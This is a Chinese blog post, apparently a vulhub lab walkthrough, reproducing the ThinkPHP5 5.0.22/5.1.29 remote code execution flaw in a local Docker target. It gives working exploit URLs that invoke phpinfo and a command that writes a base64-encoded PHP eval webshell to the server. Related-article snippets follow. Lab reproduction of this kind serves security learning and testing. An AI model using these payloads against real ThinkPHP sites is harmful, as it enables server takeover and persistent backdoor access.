vulhub Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

最新推荐文章于 2024-06-24 00:29:14 发布
最新推荐文章于 2024-06-24 00:29:14 发布
阅读量260 收藏 1
点赞数 1
分类专栏: vulhub靶场 网络安全 文章标签: 安全 php Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53409748/article/details/129592397
版权

漏洞描述

ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。

靶场环境

进入到/vulhub-master/thinkphp/5-rce 路径下 docker-compose up -d启动

可以看到报了一个错误,大概意思是版本不匹配

解决的方法很简单:

根据提示修改配置文件即可:

vim ./docker-compose.yml

将version改为2.0即可成功启动

漏洞复现

环境启动后,访问192.168.121.131:8080

使用以下payload获取phpinfo:

index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

还可以查看其他值

index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=pwwd

base64编码后上传shell:

echo%20-n%20YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi%20|%20base64%20-d>%20/var/www/public/shell.php

访问shell.php

使用工具进行连接:

连接成功

²⁰⁰²₀₂.₀₁T̶B̶
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Thinkphp-5-0远程代码执行漏洞1
08-03
### ThinkPHP 5.0 远程代码执行漏洞解析 #### 漏洞背景与概述 在本篇文章中,我们将深入探讨一个出现在ThinkPHP 5.0版本中的远程代码执行漏洞(RCE)。该漏洞的存在使得攻击者能够在满足特定条件的情况下,通过...
ThinkPHP5 5.0.22/5.1.29 RCE】
xhwfa的博客
05-02 3283
一、漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中,因为没有正确处理控制器名,致使在网站没有开启强制路由的状况下(即默认状况下)能够执行任意方法,从而致使远程命令执行漏洞。 二、影响版本 ThinkPHP 5.0系列 < 5.0.23 ThinkPHP 5.1系列 < 5.1.31 三、漏洞环境搭建 cd /vulhub-master/thinkphp/5-rce docker-compose up -d 访问192.168.110.134:8080,出现如
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-19 3033
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
Python武器库开发-武器库篇之Thinkphp5-5.0.22/5.1.29远程执行代码漏洞 (六十五)
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-24 1151
这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。然后我们在浏览器输入就可以访问靶场环境。
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
Boom!脑洞大爆炸的博客
11-11 1941
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞
不曾扬帆,何以至远方
07-17 1940
Thinkphp 5 远程代码执行漏洞
thinkphp5 5.0.22/5.1.29远程代码执行漏洞
weixin_45653478的博客
04-27 1007
ThinkPHP是中国使用极为广泛的PHP开发框架。在其版本 5 中,由于框架错误地处理了控制器名称,如果网站未启用强制路由(默认),它可以执行任何方法,从而导致 RCE 漏洞
thinkPHP5.0.22
12-06
ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。遵循Apache2开源许可协议发布,意味着你可以免费使用ThinkPHP,甚至允许把你基于ThinkPHP开发的应用开源或商业...
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
### ThinkPHP 5.0 远程代码执行漏洞分析 #### 漏洞背景与概述 ThinkPHP是一款广泛使用的PHP框架,它提供了丰富的功能和良好的性能。然而,如同任何复杂的软件系统一样,它也存在安全漏洞。本次分析的焦点集中在...
复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
weixin_67813445的博客
03-15 656
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
记录一次vulhubThinkphp5 5.0.22/5.1.29 远程代码执行漏洞复现
sszsNo1的博客
06-29 224
vulhubThinkphp5 5.0.22/5.1.29 远程代码执行漏洞复现
ThinkPHP漏洞合集(专注渗透视角)
LainWith的博客
04-11 8032
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
漏洞复现----23、ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
七天
07-14 1347
文章目录一、漏洞简介二、漏洞代码三、漏洞复现五、修复代码 一、漏洞简介 ThinkPHPPHP语言的一种开源框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,ThinkPHP框架本身没有什么特别模块要求,具体的应用系统运行环境要求视开发所涉及的模块。 由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由的情况下可以执行任意方法,从而导致远程命令执行漏洞。受影响的版
thinkphp系列vulhub所有漏洞复现ThinkPHP 2.x 任意代码执行漏洞ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
qq_47289634的博客
07-06 364
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞复现
weixin_52347768的博客
03-28 4580
远程代码执行漏洞作用: 攻击者向后台服务器远程注入操作系统命令或者代码,进而控制后台系统 远程代码执行漏洞的原理: 由于部分应用系统从设计上需要给用户提供指定的远程命令操作的接口,如果没有做严格的安全控制,可能会导致攻击者通过该接口提交恶意的命令,从而让后台进行执行,从而控制整个后台服务器。 由于需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。 启动环境,访问http://159.75.16.25:8087,看到启动界面 进行复现,poc: /i
Thinkphp5.1 ~ 5.2代码执行漏洞
公众号shadow sock7
01-16 9820
需要在library/think/Error.php中设置: error_reporting(0); http://proxy.boomeye.com:19300/wordpress/index.php/2019/01/15/thinkphp5-1-5-2-rec/ 设置前(默认情况下): 设置后: payload: POST /thinkphp-5.1.29/html/public/ind...
ThinkPHP漏洞大全
热门推荐
FY10033的博客
05-04 1万+
tp5payload大全 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection tp5参考文献 https://blog.csdn.net/weixin_40709439/article/details/86564457 tp版本发现 1.使用错误的路径 2.采用错误的参数 1.版本5.0.x<5.0.23 1.0 5.0.x-5.0.23通杀RCE-payload # 第一个 http://127.0.0.1/cms/thi
ThinkPHP RCE漏洞分析合集
hackzkaq的博客
03-18 4276
更多黑客技能 公众号:暗网黑客 作者:掌控安全-veek 一. ThinkPHP 5.0.10-3.2.3 缓存函数设计缺陷可导致代码执行 0x00 背景 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 0x01 实验环境 系统环境 服务器主机:centOS 7 php 5.4版本,apache2,ThinkPHP 5.0.10 0x02 漏洞利用 将 applicati
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值